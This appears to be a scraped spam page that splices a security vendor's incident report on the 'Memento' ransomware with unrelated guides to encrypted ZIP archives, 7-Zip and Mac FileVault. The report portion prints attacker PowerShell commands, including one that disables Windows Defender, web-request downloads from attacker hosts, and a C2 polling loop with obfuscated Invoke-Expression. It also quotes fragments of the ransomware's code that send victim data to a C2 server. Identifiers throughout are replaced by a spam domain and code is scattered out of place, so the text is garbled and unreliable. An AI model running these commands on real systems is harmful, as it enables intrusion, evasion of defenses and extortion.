How to Password Protect a Folder or File in Windows | Avast

Username and Password Archives

Username and Password Archives

A Windows login password offers a very basic level of protection that mainly keeps your files safe from others who may share your computer. Changing password for user nutanix. Old Password: New password: Retype new password: passwd: all authentication tokens updated successfully. The password must. Reset Your Password. Please enter the email address associated with your Internet Archive account. We'll send you an email to help you reset your password.

Username and Password Archives - advise

Out-File -Encoding ASCII 'C:\Windows\system32\config\systemprofile\mimu\shoppingdowntown.us'

 

This miner operator also dropped a copy of the NSSM services helper to monitor and manipulate running services (downloaded from a compromised WordPress site).

XMRig and NSSM were downloaded again on October 3, this time from a GitHub page, using a “support” administrative account created by the miner actors to execute the scripts.

Meanwhile, back at the ransomware

In October, the Memento gang began preparations to launch ransomware. They used  dropped a copy of the administrative tool Process Hacker onto the server that they used as their primary foothold on October 1, and configured Process Hacker&#;s kernel driver as a service for persistence.

For the next two weeks, the intruders continued to expand their reach within the network using RDP, occasionally deleting RDP logs to cover their tracks. On October 20, they began to use WinRAR to compress a collection of files for exfiltration, moving the archives to a directory on a shared drive they could access via RDP. They also deployed a Python-based keylogger onto the workstation of the primary system administrator for the organization, along with an installation of a legitimate remote control software  product (SOTI’s MobiControl Remote Control ), to ensure continued access for RDP sessions.

On October 22, data collection complete, the attackers then used Jetico’s BCWipe data wiping utility to remove evidence of the archived files once they were collected and to modify timestamps on others. They also cleared Terminal Services logs to erase evidence of RDP sessions.

On the evening  of October 23 (a Saturday), they executed the first iteration of their ransomware.

The first attempt at the ransomware, shoppingdowntown.us, used WinRAR to archive the files and then attempted to encrypt them. The ransomware, as stated earlier, was an executable compiled from Python —possibly compiled with the Python instance installed on the network by the actors earlier.

Because the code was compiled with PyInstaller and Python , we could not completely decompile the ransomware samples. But we were able to decode enough to understand its structure and identify most of how the ransomware worked. Its main function served only to kick off the “Demon” function imported from a module named “morph”:

 

from morph import Demon def main(): demon = Demon() shoppingdowntown.us(demon) if __name__ == '__main__': main()

The shoppingdowntown.us module that contains the Demon function also includes a number of global variables used by the ransomware:

KEYFILE = &#;shoppingdowntown.us&#;
URL = &#;hxxp://78[.]/shoppingdowntown.us&#;
START_MSG = &#;Task Started.&#;
END_MSG = &#;Task Completed.&#;
CHECK_INTERVAL =
REPORT_INTERVAL = 25

The shoppingdowntown.us file contains a public key. The URL is a command and control server that receives telemetry from each instance of the ransomware.

The “Demon” class itself executes the various other methods of the ransomware. It generates a unique ID for the system based on its IP address and Windows system name, and launches a “connector” to communicate with the command and control server, the encryption code, and a repeating timer copied straight from Stack Overflow. The connector is used to send system information, including the victim ID, system information, and progress messages as the encryption routine traverses system files.

class Demon: def __init__(self): shoppingdowntown.us = createID()   # createID returns string with IP address and hostname, like "targeted-pc" shoppingdowntown.us = datetime(, 10, 10, 15, 23)  # this time is the same in all three samples, later replaced with actual time shoppingdowntown.us = shoppingdowntown.use('.+', shoppingdowntown.usCASE) shoppingdowntown.uss = [] shoppingdowntown.us_cnt = 0 shoppingdowntown.us_bytes = 0 shoppingdowntown.us_enc_cnt = 0 shoppingdowntown.us_report_cnt = 0 shoppingdowntown.us_files = [] shoppingdowntown.ustor = Connector(shoppingdowntown.us, URL)         # Connector class is loaded from shoppingdowntown.us shoppingdowntown.usr = Cryptor(KEYFILE)                  # Cryptor, the encryption code, is loaded from shoppingdowntown.us shoppingdowntown.us = RepeatTimer(CHECK_INTERVAL, shoppingdowntown.usckCheckTimeUp)  # RepeatTimer is loaded from shoppingdowntown.us shoppingdowntown.uscInfo()

The &#;createID&#; function, as noted in the comments we added to the code above, generates a unique identifier by creating a socket connection to Google&#;s DNS service on port 80, and retrieving the local IP address for the connection (with shoppingdowntown.uskname) and the system&#;s hostname. Those values are concatenated into a single string, which is used by the Memento C2 as a system unique identifier.

The &#;sendVicInfo&#; function is exactly what it sounds like: it aggregates system information about the machine being targeted by the ransomware instance to be sent back over the C2 connection to the ransomware actors.

def sendVicInfo(self): ret_str = f'''<=== Start time ===>: {shoppingdowntown.us}\n\n''' uname = shoppingdowntown.us() ret_str += f'''System: {shoppingdowntown.us}\n''' ret_str += f'''Node Name: {shoppingdowntown.us}\n''' ret_str += f'''Release: {shoppingdowntown.use}\n''' ret_str += f'''Version: {shoppingdowntown.usn}\n''' ret_str += f'''Machine: {shoppingdowntown.use}\n''' ret_str += f'''Processor: {shoppingdowntown.ussor}\n\n''' boot_time_timestamp = shoppingdowntown.us_time() bt = shoppingdowntown.usmestamp(boot_time_timestamp) ret_str += f'''Boot Time: {shoppingdowntown.us}/{shoppingdowntown.us}/{shoppingdowntown.us} {shoppingdowntown.us}:{shoppingdowntown.us}:{shoppingdowntown.us}\n\n''' ret_str += 'Total cores: %s\n' % shoppingdowntown.us_count(True, **('logical',)) ret_str += f'''Total CPU Usage: {shoppingdowntown.us_percent()}%\n\n''' svmem = shoppingdowntown.usl_memory() ret_str += f'''Total: {convSize(shoppingdowntown.us)}\n''' ret_str += f'''RAM Percentage: {shoppingdowntown.ust}%\n\n''' partitions = shoppingdowntown.us_partitions()

 

The cryptor code uses AES to encrypt the files. The public key filename is passed to it as an argument, but it&#;s not used directly as the key for encryption. Rather, it is used to decrypt the password used in combination with a private key that is delivered from the C2 to decrypt a file called shoppingdowntown.us into a Python resource file.  The actual file encryption is AES-based, using cipher block chaining; a password is generated for each file and is RSA encrypted. The shoppingdowntown.us that defines the cryptor has the following imports and variables:

from shoppingdowntown.usKey import RSA from shoppingdowntown.us import PKCS1_OAEP from shoppingdowntown.us import AES import random import string import sys import os import subprocess SEED_LEN = 32 INITIAL_VECTOR = b'\xa4' * shoppingdowntown.us_size MAX_READ = MAX_READ_PAD = MAX_READ + shoppingdowntown.us_size ENC_EXT = 'vaultz' SIG_EXT = 'vault-key' RAR_EXE = 'shoppingdowntown.us'

 

The &#;RAR_EXE&#; variable  is a reference to the instance of WinRAR used by the attackers in this first version. It appears to be called by a function called encryptFile_r; a separate encryptFile function is used to encrypt files, while the encryptFile_r then puts them into an archive. While some systems were impacted by this first version of the ransomware, the encryption step was caught on systems with anti-ransomware protection.

Second verse, slightly different than the first

Undeterred, the Memento attackers switched approaches. With their access to the network still intact, they modified the ransomware code; instead of encrypting first, the new code used the WinRAR executable to archive files into a password-protected archive. Two additional variants of the ransomware executable, both compiled as shoppingdowntown.us, were built. Both added a command line argument handler so that parameters could be passed to the Demon class.

shoppingdowntown.us(demon, shoppingdowntown.us[1])

The second of the two added code to check the length of the argument passed from the command line—clearly a debug after the first version failed when no argument was passed.

from morph import Demon import sys def main(): demon = Demon() start = '' if len(shoppingdowntown.us) > 1: start = shoppingdowntown.us[1] shoppingdowntown.us(demon, start) if __name__ == '__main__': main()

The shoppingdowntown.us file also included some minor tweaks, including a reference to a filter file, shoppingdowntown.us:

KEYFILE = 'shoppingdowntown.us' URL = 'hxxp://78[.]/shoppingdowntown.us' START_MSG = 'Task Started.' END_MSG = 'Task Completed.' FILTER_FILE = 'shoppingdowntown.us' CHECK_INTERVAL = 3 REPORT_INTERVAL = 25

The contents of shoppingdowntown.us:

c:\\Documents and Settings c:\\Users\\All Users c:\\users\\Default User c:\\Programdata\\Application Data C:\\ProgramData\\Desktop C:\\ProgramData\\Documents C:\\ProgramData\\Start Menu" C:\\ProgramData\\Templates C:\\windows shoppingdowntown.us Local Setting C:\\ System Volume Information

This appears to have specified which paths and specific files not to encrypt.

The modifications to the ransomware changed its behavior to avoid detection of encryption activity. Instead of encrypting files, the &#;crypt&#; code now put the files in unencrypted form into archive files, using the copy of WinRAR, saving each file in its own archive with a .vaultz file extension. Passwords were generated for each file as it was archived. Then the passwords themselves were encrypted.

These variants were built and executed hours after the first attempt. The malware was spread manually by the attackers, using RDP and stolen credentials.

 

A ransom note, Hello shoppingdowntown.us, was dropped after the files were archived. The file was dropped manually in the Desktop folder of the primary IT administrator&#;s workstation. The wording and formatting is nearly identical to REvil gang ransom notes, and threatens data exposure if the ransom payment is not made. Unlike REvil, however, the demand for payment was in Bitcoin, and the Memento actors offered a payment schedule for decryption: BTC (approximately $1 million US) for all files, and varying rates for individual files by type:

Pyrrhic victories

After over 6 months dwell time on the victim&#;s network, the attack had finally been sprung. Unfortunately for the Memento actors, all that extra work did not pay off as planned. The victim did not negotiate with the ransomware actors.

Thanks to backups, the targeted organization was able to restore most of their data and return to somewhat normal operations. Additionally, for systems that were running InterceptX, the endpoint detection and response system logged the commands used by the attack to archive files—along with the unencrypted passwords for the files. SophosLabs and Sophos Rapid Response were able to recover select files for the victim and provide a method for recovering any files not backed up. 

Having effective backups of network data is critical to recovery from a ransomware attack. Unfortunately, the target&#;s exfiltrated data is still in play. And that could have long-term ramifications for the company.

We believe that the long dwell time by the ransomware actor was in part because they didn&#;t have ransomware ready to drop at the time of the initial compromise. By keeping a low profile, modifying timestamps on files and wiping logs of telltale signs of compromise, they were able to evade detection for an extremely long time and fully explore the network. The extent to which RDP services were enabled throughout the network made hands-on-keyboard lateral movement throughout the network much easier, further reducing the signature of their intrusion.

The extent to which one unpatched server exposed to the Internet by a misconfigured firewall could be used by multiple malicious actors to exploit the server (and in the case of the ransomware operator, the entire network) offers further emphasis on the urgency of applying vendors&#; security patches. At the time of the initial compromise, the vCenter vulnerability had been public for nearly two months, and it remained exploitable up to the day the server was encrypted by the ransomware attackers. Unfortunately, smaller organizations often lack the staff expertise or time required to stay on top of new vulnerability patches outside those automatically deployed by Microsoft. And many organizations are unaware of the degree of risk associated with software platforms they use that may have been installed by a third-party integrator, contract developer or service provider.

A full list of the IOCs for the Memento attack and the miner attacks from this incident is available on SophosLabs&#; GitHub page.

SophosLabs would like to acknowledge Vikas SIngh,  Robert Weiland,  Elida Leite, Kyle Link, Ratul Ghosh, Harinder Bhathal, and Sergio Bestuilic of Sophos MTR&#;s Rapid Response team, and Ferenc László Nagy, Rahul Dugar, Nirav Parekh, and Gabor Szappanos of SophosLabs for their contributions to this report.

 

 

 

 

 

 

Источник: [shoppingdowntown.us]
Out-String; $out

New ransomware actor uses password-protected archives to bypass encryption protection

In late October, Sophos MTR’s Rapid Response Team encountered a new ransomware group with an interesting approach to holding victims’ files hostage. The ransomware used by this group, who identify themselves as “Memento Team,” doesn’t encrypt files. Instead, it copies files into password-protected archives, using a renamed freeware version of the legitimate file utility WinRAR—and then encrypts the password and deletes the original files.

This was a retooling by the ransomware actors, who initially attempted to encrypt files directly—but were stopped by endpoint protection. After failing on the first attempt, they changed tactics, and re-deployed, as evidenced by the multiple versions of the ransomware payload compiled at different times found on the victim’s network. They then demanded $1 million US to restore the files, and threatened data exposure if the victim did not comply.

There were some other twists to the “Memento” attack as well. The ransomware itself is a Python script compiled with PyInstaller. And in a ransom note that largely cribs the format used by REvil (including the “[-] What’s Happen [-]” introduction), the criminals behind the ransomware instructed the victims to contact them via a Telegram account. The attackers also deployed an open-source Python-based keylogger on several machines as they moved laterally within the network using Remote Desktop Protocol.

The Memento actors also waited a long time before executing their attack—so long that at least two different cryptocurrency miners were dropped onto the server they used for initial access during the course of their dwell time by different intruders using similar exploits.

Initial compromise

The ransomware actors appear to have taken advantage of a flaw in VMware’s vCenter Server web client first revealed in February. The vulnerability allowed anyone who had TCP/IP port access to the server to execute commands remotely with system-level privileges; a firewall had been misconfigured, and the vCenter Server was exposed to the Internet on that port. This server had outdated malware protection and was not configured with endpoint detection and response .

While there are hints of the actors behind this attack gaining access to the targeted network as early as mid-April, the first real signs of intrusion were on May 4: the dropping of PyInstaller-compiled versions of two tools from the Impacket toolset—the wmiexec remote shell tool (which executes commands via Windows Management Instrumentation) and the secretsdump  hash dumping tool were dropped onto a Windows server. The hash dump tool was likely used to acquire credentials for accounts that would be used later.

Six days later, they came back and began further setting up shop, first using a PowerShell command to attempt to turn off malware scanning:

 powershell Set-MpPreference -DisableRealtimeMonitoring $true

Next, the intruders started using PowerShell web requests to pull down files: first, a copy of a command-line version of the WinRAR utility, and then a pair of RAR archives on the compromised server. These commands were executed using the wmiexec remote shell, connecting to a host (now unreachable) in South Korea:

powershell Invoke-WebRequest -Uri hxxp://[.]/shoppingdowntown.us -OutFile c:\temp\shoppingdowntown.us powershell Invoke-WebRequest -Uri http://[.] /shoppingdowntown.us -OutFile c:\temp\shoppingdowntown.us powershell Invoke-WebRequest -Uri hxxp://[.]/shoppingdowntown.us -OutFile c:\temp\shoppingdowntown.us

 

Among the files then extracted from the RAR archive were:

  • shoppingdowntown.us—a copy of the Plink SSH tunneling tool, allowing them to gain an interactive console connection with the compromised server.
  • shoppingdowntown.us—NMAP, the network scanning tool.
  • Npcapexe—the installer for the NPCAP network packet capture library and its associated kernel driver.
  • shoppingdowntown.us—Mimikatz, the credential stealing tool.

The actors used Plink to connect via SSH from another South Korean IP address (27[.]). Next, they set up a batch file (shoppingdowntown.us) as a scheduled task (named Windows Defender Metadata Monitor) to establish persistence—pulling commands from a PHP script running on the compromised web server operated of a publisher in South Korea (novelupdate[.]com) using PowerShell’s Invoke-RestMethod.  The script used a nearly identical call to another domain (checkvisa[.]xyz).

Next, the intruders used administrative credentials they had gained to connect to the server via Remote Desktop Protocol, tunneling over the SSH connection. They installed another reconnaissance tool—Advanced Port Scanner—as well as the Python runtime environment. They also dropped two disk utilities—WizTree and DiskSavvy.  And they gradually moved laterally, using Mimikatz and secretsdump to compromise three accounts and create two new ones with a compromised “admin” account.

On September 28, someone (most likely the ransomware actors) dropped another copy of the Plink SSH connection, using the transfer[.]sh file transfer service. They used this additional Plink instance to create a reverse shell connection to the account “dontstarve” at a host named google[.]onedriver-srv[.]ml. This copy of Plink was dropped with the file name shoppingdowntown.us, and the configuration of the SSH connection was invoked with a shoppingdowntown.us  Once the reverse shell was set up, the attackers scheduled a task named “GoogleChangeManagementSchedule”—a PowerShell encoded command that uploaded data about the IP address of the compromised server, and then performed some automated exchanges of data that appear to have been related to reconnaissance:

$c = "" $p="" $r = "" $u = "hxxp://google[.]onedriver-srv[.]ml/gadfTs55sghsSSS" $wc = New-Object shoppingdowntown.usent $li = (Get-NetIPAddress -AddressFamily IPv4).IPAddress[0] $Response = Invoke-WebRequest -Uri hxxp://curlmyip[.]net -UseBasicParsing $c = "whoami" $c = 'Write-Host " ";'+$c $r = &(gcm *ke-e*) $c

7-Zip is an open source software used to compress or zip files secured with encryption.

When you send or transfer files that contain Personal Identifiable Information (PII) or other confidential and sensitive data, the files must be encrypted to ensure they are protected from unauthorized disclosure.

7-Zip, like WinZip, creates a container called archive that holds the files to be protected. That archive can be encrypted and protected with a password. 7-Zip is a free software that creates Zip files that can be opened with WinZip or other similar programs.

To obtain a copy of 7-Zip, please see shoppingdowntown.us and select the appropriate Download link.

Once the software is installed, please follow these steps to encrypt a file or folder.

Step 1: Right click on the file / folder to be encrypted.

Step 2: Select “7-Zip” then “Add to archive…”

Add to Archive

 

 

 

 

Step 3: In the Add to Archive window change the name of the archive you wish to create.

Add name

 

 

Step 4: Change the Archive format to “Zip”.

Add Zip

 

 

 

 

Step 5: Change the Encryption Method to “AES”.

There is a trade-off between using AES and ZipCrypto. AES is proven much more secure than ZipCrypto, but if you select AES the recipient of the zip file may have to install 7-zip or another zip program to read the file contents. Selecting ZipCrypto may allow users to open the zip file in Windows without a zip program, but it does not provide adequate protection against attackers with modern cracking tools.

It is strongly recommended to use AES to protect sensitive and confidential data.

Step 5

 

 

 

 

 

 

 

Step 6: Enter a Password. Use a strong password with at least 8 characters containing upper and lowercase letters, and a minimum of one number.

Enter Password

 

 

 

 

 

 

 

Step 7: Select “Ok” to create the encrypted archive file. The new archive file will be located in the same folder as the original.

**IMPORTANT** &#; Do not share a password via email. Passwords must be shared via out of band. Meaning that you send the file and the password by different communication channels; one on the internet, and one not. The best way is to call the recipient of the Zip file and convey the password over the phone.

Источник: [shoppingdowntown.us]

Imagine you’re staring at a file or folder—perhaps confidential employee information that you need to send to your accountant. If attaching it to an email message makes you think, “That doesn’t seem like a good idea,” award yourself a gold star!

Sending sensitive files via email is a bad idea, partly because the email could be intercepted in transit (possible but highly unlikely), but more because the files then live in both your and your recipient’s email accounts in an unprotected form. If an attacker were to gain access to either of your email accounts, they might scan for patterns like credit card numbers, ID numbers, phone numbers, and postal addresses and find them even in attachments.

There are ways of encrypting email messages so they can be read only by the recipient and never exist in an unencrypted form other than while being created or read, but they’re difficult to set up and fussy to use. For most people, most of the time, encrypted email is overkill.

For a more straightforward solution to exchanging information securely via email, use password-protected and encrypted ZIP archives. They’re easy to create on the Mac, either using a simple command in Terminal or with a third-party utility. And better yet, any Mac user can expand them using the built-in Archive Utility simply by double-clicking and entering the necessary password.

Create Encrypted ZIP Archive Using Terminal

Although many Mac users are intimidated by using the Unix command line in Terminal, making an encrypted ZIP archive is easy enough for anyone. All it takes is typing a single command, dragging a file or folder to Terminal, and entering a password twice. Follow these steps, which make an encrypted ZIP archive on your Desktop:

  1. In your Applications folder, open the Utilities folder and double-click Terminal to launch it.
  2. Type (or copy and paste) this command, replacing “archiveName” with whatever you want to name the ZIP file and making sure to type a space after the last letter—the “p” in “zip”. (The tilde ~ character is Shift-backtick, and it’s the key to the left of the numeral 1 key.) zip -er ~/Desktop/shoppingdowntown.us
  3. Drag the file or folder you want to protect into the Terminal window to complete the command.
  4. Press Return, and when prompted, enter the desired password twice—the second time is for confirmation.
    Terminal encrypted Zip x

Create Encrypted ZIP Archive Using Archiver

If you have trouble with the command-line method or plan to create encrypted ZIP archives regularly, it’s worth using a Mac app that simplifies the process even more. There are various apps, but a particularly straightforward one for those running macOS 11 Big Sur is Archiver ($, with a free trial). Download it and then follow these steps to create an encrypted ZIP archive:

  1. Launch Archiver.
    Archiver 1
  2. Drag a file or folder to the Archiver window and click the Archive button in the toolbar.
    Archiver 2
  3. Select the archive format (use ZIP), click the Encrypt checkbox, enter the password twice, and click the Archive button in the toolbar.
    Archiver 3
  4. Drag the ZIP archive to the Desktop or another folder and click the Done button.
    Archiver 4

Decrypting a ZIP Archive

As noted earlier, decrypting a password-protected ZIP archive on the Mac is as simple as double-clicking it and entering the password when prompted.

Decrypt Zip archive Mac

What about iOS or iPadOS? Never fear, since the Files app can also decrypt ZIP archives; just tap the archive to open it and enter the password when prompted.

Decrypt Zip archive iPhone x

A Word about Passwords

It’s important to think briefly about how you’re going to communicate the password to your recipient. Don’t send it in email or else anyone who compromises either your email account or your recipient’s account could decrypt the ZIP archive.

Instead, use what’s called an “out of band” communication channel. In other words, if you’re going to send the ZIP archive via email, communicate the password in a phone call or text message. That would keep the password safe if either of your email accounts were compromised.

If you’re sending password-protected ZIP archives to a particular person regularly (and the files don’t contain state or corporate secrets), you could agree on a system for generating passwords so you don’t have to communicate each one individually. For instance, you could combine a random word and the current month, so the password would be “cheddar9September” one month and “cheddar10October” the next.

As you can see, you can use this technique with so little extra effort that it’s worth ensuring a higher level of security whenever you need to share confidential information.

(Featured image by shoppingdowntown.us vijayan)


Social Media: It’s good to be cautious about attaching sensitive files to email—if either your or your recipient’s email account were to be compromised, confidential information could be revealed. Instead, send password-protected ZIP archives. Here’s how:

Источник: [shoppingdowntown.us]
Out-String > "$env:tmp\$($shoppingdowntown.us())-$($li)" $ur = $shoppingdowntown.usFile("$u/shoppingdowntown.us" , "$env:tmp\$($shoppingdowntown.us())-$($li)") while($true) { $c = $shoppingdowntown.usadString("$u/$($shoppingdowntown.us())-$($li)/txt") $c = 'Write-Host " ";'+$c if($c -ne $p) { $r = &(gcm *ke-e*) $c

How to Encrypt and Password Protect Files on Your Mac

How To

Posted on April 16th, by Jay Vrijenhoek and Kirk McElhearn

How to Encrypt Files on Mac

To protect your sensitive data, you should use encryption and password protection wherever possible; macOS provides you with a number of ways to implement it. Best of all, you can do this with built-in software and features that are part of macOS.

This article covers five areas where you can encrypt or password protect files:

  1. Encrypt System Data and Your Startup Drive
  2. Encrypt External Drives
  3. Encrypt Documents and Files
  4. Encrypt Backups
  5. Encrypt Files You Send to Others

Encrypt System Data and Your Startup Drive

The best way to prevent unauthorized access to your data is to encrypt your startup drive. But you should also set a password to protect your Mac when the screensaver is active, and you can set a firmware password to prevent someone from starting up your Mac from an external drive.

Using FileVault to Encrypt Your Startup Drive

FileVault, the built-in full-disk encryption feature in macOS, is a robust way to encrypt the contents of your entire startup drive. It is important to use a strong password to secure your user account, because that password not only gives you access to your account, but it also unlocks your drive. A simple password (&#;,&#; or &#;password1,&#; etc.) is easy to guess and will allow anyone to log in, thus bypassing FileVault protection.

To enable FileVault, follow these steps:

  1. From the Apple menu, choose System Preferences.
  2. Go to the Security & Privacy pane.
  3. Click the FileVault tab.
  4. Click the padlock to make changes, then click Turn On FileVault&#;

    You will be asked to choose a method to unlock your disk if you ever lose your account password.

    If you choose to use your iCloud account, Apple will store the recovery key for your disk on its servers, and you&#;ll have to provide questions and answers for three security questions that will unlock the disk.

    The recovery key method is more secure, since if someone gets access to your user data, they may have your Apple ID and its password, but you have to make sure that you can store it safely. If you use a password manager, you can store it there, and you&#;ll be able to access it from your iPhone or iPad if necessary.

    If you select the iCloud option, you will be prompted to restart your Mac and the encryption process will begin. However, if you select recovery key an additional window will show with that key.

  5. The encryption process will begin, and you can use your Mac as you always would. You probably won&#;t notice any performance hit as FileVault encrypts your disk, and, depending on the size of your Mac&#;s drive, this will take from a few hours to overnight. Your Mac has to be plugged in for the encryption process to advance, so if you have a laptop make sure to connect it to power. And encryption only occurs when the Mac is awake.
    In the future, you&#;ll have to log into your Mac each time you start it up, and each time you wake it from sleep. You can&#;t use automatic login on a Mac with FileVault.

Activating a Screensaver Password

FileVault protects your data at rest, meaning if the Mac is off, sleeping or you are logged out, a password is required to get access. Once you are logged in the data is accessible to you or anyone else that can sit at your Mac while you&#;re not looking. To prevent this, you should set a password so when your Mac is asleep, or when a screensaver is active, a password is required to access the Mac. And if you set a password like this, it&#;s easy to lock your Mac, without even clicking your mouse.

To enable the sleep and screensaver password, click here and follow these steps:

    1. From the Apple menu, choose System Preferences.
    2. Go to the Security & Privacy pane.
    3. Click the General tab.

    1. Click the padlock to make changes, then check the Require password — after sleep or screen saver begins. The dropdown menu offers you options as to how soon the password protection should kick shoppingdowntown.us&#;s best to choose immediately here; that way, you don&#;t have to worry about how long it takes before your Mac is protected. And if you choose this setting, you can set a hot corner that will activate your screen saver when your mouse pointer reaches a specified corner of your display.

      To do this, go back the Desktop & Screen Saver pane of System Preferences. Click the Screen Saver tab, then, at the bottom of the window, click the Hot Corners&#; button.

Hot corner actions occur when you move your cursor into one of the corners of your screen. As you can see below, I have four actions set for the four corners of my display. At the top left is Put Display to Sleep. Since my security settings require a password immediately after the display is asleep, this provides instant protection from prying eyes.

You can also put your Mac to sleep by pressing Option–Command–Media Eject, if you want, but if you leave it running with the screen saver, then operations can continue while you&#;re away from your Mac.

Setting a Firmware Password

To prevent unauthorized users from starting up your Mac from another drive, or from the recovery partition, you can set a firmware password. Once set, when you start your Mac from your normal startup disk, you see the normal login window where you enter your user account password. If you try to start up from another drive, or from macOS Recovery, your Mac pauses startup and displays a lock icon with a password field instead.

However, you can only set a firmware password on an Intel Mac; the new Macs with Apple&#;s own processors do not support this. Apple recommends the use of FileVault to protect your data on these Macs, and, to be honest, if you are using FileVault even on an Intel Mac, you probably don&#;t need a firmware password.

To set a firmware password, follow these steps:

      1. Restart your Mac and hold down Command+R as soon as the screen turns black. Your Mac will now boot from the recovery partition. This may take longer than usual but just keep holding down the keys until you see a progress bar.
      2. When the Mac finishes starting up, you should see the Utilities window.
      3. Select Utilities from the menu bar and then choose Firmware Password Utility.
      4. Click Turn On Firmware Password, enter a password, then click Set Password. Make sure to keep a record of the password, in a password manager on another device, for example.
      5. Quit the Utility, then choose Apple Menu > Restart, to restart your shoppingdowntown.us&#;ll only be asked for the firmware password if someone is attempting to start your Mac from a drive other than the one selected in the Startup Disk pane of System Preferences. If you want to start up from another drive, without having to enter the firmware password, you can change the startup drive, then click Restart in that preference pane.

Encrypt External Drives

FileVault takes care of your startup drive, but what if you have other drives? You may have one or more external drive that you use to store data or for backups; portable drives that you use to take files to and from work; and even USB thumb drives. You may also have drives that are formatted with two or more partitions, and you can choose to encrypt certain partitions on these drives, if you want. You can encrypt these drives manually to protect their data.

Encrypting Drives and Partitions (Option 1)

To encrypt a drive or partition using the Finder, follow these steps:

      1. Anything can happen from a sudden drive failure to a power outage so always make sure you have a current backup.
      2. Right-click on the drive icon on your Desktop, in a Finder window, or in the Finder sidebar.
      3. Choose Encrypt. A dialog displays inviting you to set a password, type it a second time, and enter a password hint. The password hint is required, so you cannot leave it blank. If you think you need a hint, set one that only makes sense to you. Since you will need to enter the password after every restart or every time you connect the drive, the chances of forgetting that password are slim, so you may not need a hint. If you don&#;t think you&#;ll forget the password, set a hint that makes no sense at all and will only confuse an unauthorized person.
      4. Click Encrypt Disk and let it work for you in the background. When the encryption has completed, you&#;ll see Decrypt in the contextual menu when you right-click on the drive. If you ever want to turn off the encryption, choose Decrypt and enter the password, and macOS will decrypt the drive and remove its encryption.

Note that when you encrypt drives on macOS Big Sur, they are converted to the APFS format, which is not readable by Macs running versions of macOS older than High Sierra.

Encrypting Drives and Partitions (Option 2)

You can also encrypt drives or partitions through Disk Utility, but it will require you to erase them in the process. For new or empty hard drives or drives that still ned to be partitioned, Disk Utility is a good option since you&#;re likely already using it anyway to handle the partitioning.

To encrypt a drive or partition using Disk Utility, follow these steps:

      1. Open Disk Utility; it&#;s in the Utilities folder in your Applications folder.
      2. Select the drive or partition you want to encrypt. In this example, I&#;m using a USB thumb drive, but you can do this on any drive, other than your startup drive. Make sure that you&#;ve backed up the data on the drive, because the next step erases it completely.
      3. Click Erase. In the dialog that displays, name the drive, then click the Format menu. In macOS Big Sur, you have to use the APFS format to encrypt drives: choose APFS (Encrypted). Enter a password, type the password again in the Verify field, then enter a password hint; it&#;s not required here, but it is recommended.
      4. Click Choose when done, and the drive or partition will be erased and shoppingdowntown.us that when you encrypt drives on macOS Big Sur, they are converted to the APFS format, which is not readable by Macs running versions of macOS older than High Sierra.

You can verify the encryption is in place by clicking that same drive again in Disk Utility. It will now show that the drive is formatted in an encrypted format as shown in the screenshot below.

Going forward, every time you restart your Mac or mount the drive, a window like this displays:

If you save the password in your keychain, then you won&#;t need to enter it again. However, if someone manages to get into your account, the drive will mount automatically. So it&#;s better protected to not save the password, but you&#;ll need to remember it, and it&#;s more likely that people choose weaker passwords when they have to remember them.

Encrypting Disk Images

You can also create encrypted disk images to store files. Think of these as folders with their own encryption. Even if the hard drive the data is on is already encrypted, some want an additional layer of security for certain files or folders, and an encrypted disk image has its own password.

You can create two types of disk images: you can create standard disk images, with a fixed size, or you can create &#;sparse images&#; for which you define a maximum size, but which only use the amount of space of the files you&#;ve added. However, these disk images can grow as you add more files to them. The encryption applies to any files or folders you add to the disk image.

To create an encrypted disk image using Disk Utility, follow these steps:

      1. Open Disk Utility; it&#;s in the Utilities folder of your Application folder.
      2. Choose File > New Image > Blank Image. If you want to create a disk image from an existing folder, choose File > New Image > Image From Folder.
      3. The following dialog displays:

        Depending on your needs, this can be set up in different ways. I&#;ll stick with the scenario that fits the most common uses.

      4. There are a number of configuration options and settings:
        • The Save As file name is what you&#;ll see in the Finder, such as shoppingdowntown.us
        • In Where, choose a location to save the disk image.
        • The Name is what displays on your Desktop after you double click the disk image.
        • For Format, close APFS for a Mac that has an SSD and is running macOS or later. Choose Mac OS Extended (Journaled) if you want to use the disk image on a Mac running macOS or earlier. If you want to access the disk image on Windows, and it&#;s 32 GB or smaller, choose MS-DOS (FAT); for Windows above 32 GB, choose ExFAT.
        • For Partitions, let Disk Utility set the appropriate option according to the format you choose.
        • For Image Format, you can choose read/write disk image for standard disk images, or you can choose sparse image or sparse image bundle if you want a disk image that will expand as you add files.
        • Select the Size of the disk image. In general, you either know how many files you want to put in your disk image, or you want to leave space to add more files. If you choose a read/write disk image, set the size for what you need, leaving room to add more files if necessary. The disk image will take up that amount of space on your drive. However, if you choose sparse image, set the maximum size you want for the disk image. The disk image won&#;t take up much size right away, but will grow as you add or remove files. An empty sparse image is less than 10 MB, but as you add more files it will grow. So don&#;t hesitate; set it to 1 GB or more.
        • Next choose the Encryption level. There are two encryption options, and if you have a lot of files, and a large disk image, you should choose bit encryption. bit encryption is more secure, but slower, though if you have a recent Mac it should have on trouble working with that level of encryption. Click Save when everything is set up and Disk Utility creates the disk image, then the Finder opens and mounts the disk image; you&#;ll find it on your Desktop or in the Finder sidebar.
      5. Select the disk image you just created and press Command+i or right click on it and select &#;Get Info.&#;

        The reason I recommend using the sparse disk image now becomes clear. I set the disk image to be 1 GB, but it only takes up MB on my drive. This is because the sparse disk image format grows in size when needed, until it reaches the size you set in Disk Utility; in my case, this is 1 GB. If you find you need a bigger disk image down the road, just create a new one and copy the data over.

      6. If you want to encrypt an existing folder, select the folder you want to encrypt, set a name, encryption strength, and format (read/write if you want to make changes to the contents later on).

Keep in mind that this disk image, created from a folder, will not be able to store more files than what&#;s already there. This makes the Image From Folder method a good one for long term storage of files you&#;re done with. If you need to frequently access the contents or add to it, a sparse disk image, or a read/write disk image, of a size larger than the files you currently want to store in it, is a better way to go.

Encrypt Documents and Files

Data has to leave your Mac, and for any number of reasons. It&#;s safe on your Mac, if you take the precautions explained in this article, but what if you need to email or message a document or file to someone? There are several ways to password protect your documents and files, depending on the type of files.

Password Protecting through the Preview App

The Preview app is versatile and often underestimated. One of the things it can do for you is encrypt files, allowing you to protect them with a password.

To password protect a file using Preview, follow these steps:

      1. Open any PDF file or image in Preview. On macOS, you can save any file as a PDF from the Print menu. Choose File > Print, then click the PDF menu and choose Save as PDF.
      2. From the File menu, select Export as PDF&#;
      3. In the save dialog, that drops down, rename your file if you want, then click the Show Details button at the bottom.
      4. You&#;ll see an option to enable encryption and set a password.
      5. Once a password is set and the file is saved, when you open the PDF file it will prompt for a password.

The above steps will work for any image or document that Preview can open.

